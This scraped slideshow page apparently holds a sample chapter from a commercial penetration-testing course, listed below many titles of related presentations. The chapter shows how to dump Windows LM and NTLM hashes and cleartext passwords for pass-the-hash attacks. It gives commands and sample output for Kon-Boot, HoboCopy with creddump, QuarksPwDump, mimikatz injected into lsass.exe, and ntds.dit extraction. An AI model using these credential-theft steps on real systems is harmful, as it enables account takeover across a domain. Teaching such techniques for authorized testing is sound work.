WARNING! Sample chapter -Materials in this sample chapter is selected advanced penetration from https://training.zdresearch.com https://training.zdresearch.com.

Slides:

Advertisements

Similar presentations

This course is designed for system managers/administrators to better understand the SAAZ Desktop and Server Management components Students will learn.

Advertisements

Managing User, Computer and Group Accounts

CREATING USER ACCOUNTS Group accounts simplify administration by organizing user accounts into a single administrative unit. They provide a convenient.

Experience with NTLM v2 on Win2K in NT 4.0 Domain Myung Bang Jefferson Lab Hepix-HepNT 2000 October 31, 2000.

1 Preparing Windows 2000 installation (Week 3, Wednesday 2/25/2006) © Abdou Illia, Spring 2006.

Module 6: Configuring Windows XP Professional to Operate in a Microsoft Network.

The Cain Tool Presented by: Sagar Chivate CS 685F.

Pass-The-Hash: Gaining Root Access to Your Network

Chapter 4 Chapter 4: Planning the Active Directory and Security.

4/17/2017 © 2014 Microsoft Corporation. All rights reserved. Microsoft, Windows, and other product names are or may be registered trademarks and/or trademarks.

Chapter 8 Chapter 8: Managing the Server Through Accounts and Groups.

Exposing the Secrets of Windows Credential Provider Presented By: Subrat Sarkar Give me your password.

Esri UC2013. Technical Workshop. Technical Workshop 2013 Esri International User Conference July 8–12, 2013 | San Diego, California Administering Your.

Database Security and Auditing: Protecting Data Integrity and Accessibility Chapter 3 Administration of Users.

© 2005 Hewlett-Packard Development Company, L.P. The information contained herein is subject to change without notice Advanced Samba Administration Part.

Directory and File Transfer Services Chapter 7. Learning Objectives Explain benefits offered by centralized enterprise directory services such as LDAP.

Hacking Windows 2K, XP. Windows 2K, XP Review: NetBIOS name resolution. SMB - Shared Message Block - uses TCP port 139, and NBT - NetBIOS over TCP/IP.

Module 1: Installing Active Directory Domain Services

MS systems use one of the following: LanManager Hash (LM) LanManager Hash (LM) NT LanManager (NTLM) NT LanManager (NTLM) Cached passwords Cached passwords.

Microsoft Windows 2003 Server. Client/Server Environment Many client computers connect to a server.

Chapter 4 Windows NT/2000 Overview. NT Concepts  Domains –A group of one or more NT machines that share an authentication database (SAM) –Single sign-on.

Windows This presentation is an amalgam of presentations by Mark Michael, Randy Marchany and Ed Skoudis. I have edited and added material. Dr. Stephen.

Chapter-4 Windows 2000 Professional Win2K Professional provides a very usable interface and was designed for use in the desktop PC. Microsoft server system.

Database Security and Auditing: Protecting Data Integrity and Accessibility Chapter 3 Administration of Users.

Windows Server 2008 R2 Domain Name System Chapter 5.

User Manager for Domains.  Manages the user accounts in a domain  It is located in the PDC  While User Manager exists in each NT machine, but it is.

Configuring and Troubleshooting Identity and Access Solutions with Windows Server® 2008 Active Directory®

Module 7: Fundamentals of Administering Windows Server 2008.

Windows Security. Security Windows 2000/XP Professional security oriented Authentication Authorization Internet Connection Firewall.

Step By Step Windows Server 2003 Installation Guide Step By Step Windows Server 2003 Installation Guide.

Computer Security and Penetration Testing Chapter 16 Windows Vulnerabilities.

FTP Server and FTP Commands By Nanda Ganesan, Ph.D. © Nanda Ganesan, All Rights Reserved.

8.1 © 2004 Pearson Education, Inc. Exam Designing a Microsoft ® Windows ® Server 2003 Active Directory and Network Infrastructure Lesson 8: Planning.

Chapter 13 Users, Groups Profiles and Policies. Learning Objectives Understand Windows XP Professional user accounts Understand the different types of.

We will now practice the following concepts: - The use of known_hosts files - SSH connection with password authentication - RSA version 2 protocol key.

A+ Guide to Managing and Maintaining Your PC Fifth Edition Chapter 13 Understanding and Installing Windows 2000 and Windows NT.

Module 5 Configuring Authentication. Module Overview Lesson 1: Understanding Classic SharePoint Authentication Providers Lesson 2: Understanding Federated.

Lesson 17-Windows 2000/Windows 2003 Server Security Issues.

Breno de MedeirosFlorida State University Fall 2005 Windows servers The NT security model.

SQL Server Security By Mattias Lind For PASS Security VC.

Mastering Windows Network Forensics and Investigation Chapter 13: Logon and Account Logon Events.

Kerberos Named after a mythological three-headed dog that guards the underworld of Hades, Kerberos is a network authentication protocol that was designed.

 Chapter 14 – Security Engineering 1 Chapter 12 Dependability and Security Specification 1.

Planning a Microsoft Windows 2000 Administrative Structure Designing default administrative group membership Designing custom administrative groups local.

Module 3 Configuring File Access and Printers on Windows 7 Clients.

Introduction to Information Security Network Traversal nirkrako at post.tau.ac.il itamargi at post.tau.ac.il.

NT4 SP4 Security Jack Schmidt - Fermilab

Hacking Windows What to do first?  Patch : of course the first thing to do is apply SP3 and the critical updates. More will come …critical updates.

MEMBERSHIP AND IDENTITY Active server pages (ASP.NET) 1 Chapter-4.

NetTech Solutions Security and Security Permissions Lesson Nine.

FTP COMMANDS OBJECTIVES. General overview. Introduction to FTP server. Types of FTP users. FTP commands examples. FTP commands in action (example of use).

Chapter 7 Server Management Policies –User accounts –Groups Rights and permissions Examples.

LM/NTLMv1 Retirement Hosted by LSP Services.

LINUX Presented By Parvathy Subramanian. April 23, 2008LINUX, By Parvathy Subramanian2 Agenda ► Introduction ► Standard design for security systems ►

Security-Enhanced Linux Stephanie Stelling Center for Information Security Department of Computer Science University of Tulsa, Tulsa, OK

Business Objects XIr2 Windows NT Authentication Single Sign-on 18 August 2006.

PostExploitation CIS 5930/4930 Offensive Computer Security Spring 2014.

By Alva `Skip` DUCKWALL & Benjamin DELPY Abusing Microsoft Kerberos sorry you guys don’t get it.

Hacking Windows.

Chapter Objectives In this chapter, you will learn:

WEB APPLICATION TESTING

I have edited and added material.

Introduction to Operating Systems

ACTIVE DIRECTORY ADMINISTRATION

Darren Mar-Elia Head of Product

Lesson 16-Windows NT Security Issues

BACHELOR’S THESIS DEFENSE

BACHELOR’S THESIS DEFENSE

BACHELOR’S THESIS DEFENSE

Network Penetration Testing & Defense

Presentation transcript:

WARNING! Sample chapter -Materials in this sample chapter is selected advanced penetration from -We hope you enjoy it !

Obtaining Windows Passwords -Now you know about pass the hash and how windows hashing works lets look at some attack scenario -Let’s assume that we are within a network that using domain controller for managing resources and users.

Obtaining Windows Passwords - For your remember let’s take a quick look at how Active directory works again

Obtaining Windows Passwords -Ok now let’s go for scenarios that we can use to obtain NT and LM hashes for doing pass the hash attacks. 1- Physical attack and password bypass 2- Dumping NT and LM hashes using SAM database 3- Dumping Windows passwords from password history 4- Dumping passwords and hashes from logon sessions 5- Dumping hashed password from Domain Controller

Physical attack and password bypass In first scenario we have physical access to the system so how we can login into password protected system ? the answer is very easy windows do not offer any protection for physical access attacks You can use any live disk to modify SAM database in /system32/config You can boot using both USB and CD But there is problem in this method the user will informed it when you modified her/his password or added totally new user So what is solution now ?

Physical attack and password bypass Using Kon-Boot to win You can buy it for 15$ Kon-Boot will doing temporary patch on kernel So you can login with any user without the pass Do your jobs and restart the system The original password will still work So you did full stealth attack !

Dumping NT and LM hashes using SAM database Second scenario is using You need copy of protected SAM file and by default not possible Using hobocopy or Fast RAW file copier make it possible C:\hobo copy\x64>HoboCopy.exe c:\Windows\System32\config c:\config-bkp 44 files ( MB, 1 directories) copied, 0 files skipped

Dumping NT and LM hashes using SAM database Now you can use creddump in your BT/Kali to extract hashes You need copy of protected SAM file and by default not possible Using hobocopy or Fast RAW file copier make it possible you can see the SYSTEM file here this file is called system hive and syskey too and used for offering more securing password mechanism /root/SYSTEM /root/SAM Administrator:500:1d9321d6da8213bdc fc3ea9db:80290fc9b3c2b233769aa9d6ced8bc86:::

Dumping Windows passwords from password history In the networks with more than 10 user maybe you are out of luck if you look at SAM file But refer to how DC is configured we may can use some situation to find attacks on host machine One of main situations here is using Password history feature

Dumping Windows passwords from password history This policy will not let user use same password they used in X period For example if your password was your next password after expire can’t be same as A very cool tool called QuarckspwDump can help you to dump hashes in these situations C:\>QuarksPwDump.exe -dhl –hist Administrator:500:44EFCE164AB921CAAAD3B435B51404EE:32ED87BDB5FDC5E9CBA D4::: Administrator_hist0:500:44EFCE164AB921CAAAD3B435B51404EE:32ED87BDB5FDC5E9CBA D4::: Administrator_hist1:500:AEBD4DE384C7EC43AAD3B435B51404EE:7A21990FCD3D759941E45C490F143D5F::: Administrator_hist2:500:B757BF5C0D87772FAAD3B435B51404EE:7CE21F17C0AEE7FB9CEBA532D0546AD6:::

Dumping passwords and hashes from logon sessions We are still not down ! We have a more very cool methods to obtaining windows passwords Windows will keep every single success login in memory and call this logon session The info in memory includes username, workgroup and NT:LM hashed password And this memory storage is not only about GUI login it can be happen from : RDP login Using RunAS feature Using every API call that needs login like CreateProcessWithLogon Etc.

Dumping passwords and hashes from logon sessions For extracting logon session as you know you need privileged user For this task we will use french tool called mimikatz This tool will extract passwords by injection a DLL called securlsa.dll into lsass.exe process You can follow next slide method to dump windows passwords in clear text ! Please note you should write every command after # sign.

Dumping passwords and hashes from logon sessions mimikatz # privilege::debug Demande d'ACTIVATION du privilège : SeDebugPrivilege : OK mimikatz # inject::process lsass.exe sekurlsa.dll PROCESSENTRY32(lsass.exe).th32ProcessID = 432 … mimikatz full Authentification Id : 0; Package d'authentification : NTLM Utilisateur principal : Administrator Domaine d'authentification : Sensetive-man msv1_0 : * Utilisateur : Administrator * Domaine : Sensetive-man * Hash LM : 44efce164ab921caaad3b435b51404ee * Hash NTLM : 32ed87bdb5fdc5e9cba d4 wdigest : * Utilisateur : Administrator * Domaine : Sensetive-man * Mot de passe : tspkg : * Utilisateur : Administrator * Domaine : Sensetive-man * Mot de passe : kerberos : * Utilisateur : Administrator * Domaine : Sensetive-man * Mot de passe : mimikatz #

Dumping passwords and hashes from logon sessions Ok so we can clear-text password why ? In Windows after Vista there is new (SSP) Security Support Provider for RDP shortly called Tspkg. This feature will add single sing-on (remember me !) to this protocol. And in almost all Windows we have another feature called WDigest and this is another SSP implementation for authentication and due to logical flow in it, for responding to challenges it will keep clear-text version of password in memory.

Dumping passwords and hashes from logon sessions Using Kerberos protocol or msv1_0 authentication that used by lsass for connecting to domains, will force the windows to keep passwords in clear-text. In following figure you can see SSP settings for windows 7 machine.

Dumping hashed password from Domain Controller Ok we are at last method in our dumping windows password journey To now you should can understand it easily you can find your DC manager password from your host memory. So you will connect to your DC using RDP and will look at the SAM file and all you will get is the users for DC machine not all users domain users. For getting all users password you should head on to \windows\NTDS

Dumping hashed password from Domain Controller For accomplishing this task we need two tool one is called libesedb and our previously used creddump So you can have to compile libesedb and put your hash table you got from NTDS in NTDS.export directory #cd libesedb #chmod +x configure #./configure && make -- Now extract the hash table from ntds.dit and put it in NTDS.export directory in same program directory #cd esedbtools #./esedbdumphash../../ntds.dit Now you can use creddump to dump passwrds remember you need SYSTEM file python dsdump.py../SYSTEM../NTDS.export/datatable Administrator:500:NO PASSWORD*********************:031F8E5A76932FC5CC ADAE4EC:::

End of sample Using these simple tools and tricks you can successfully completely compromise a lot of windows network during your penetration tests. I hope you enjoyed the sample and see you in full course !!!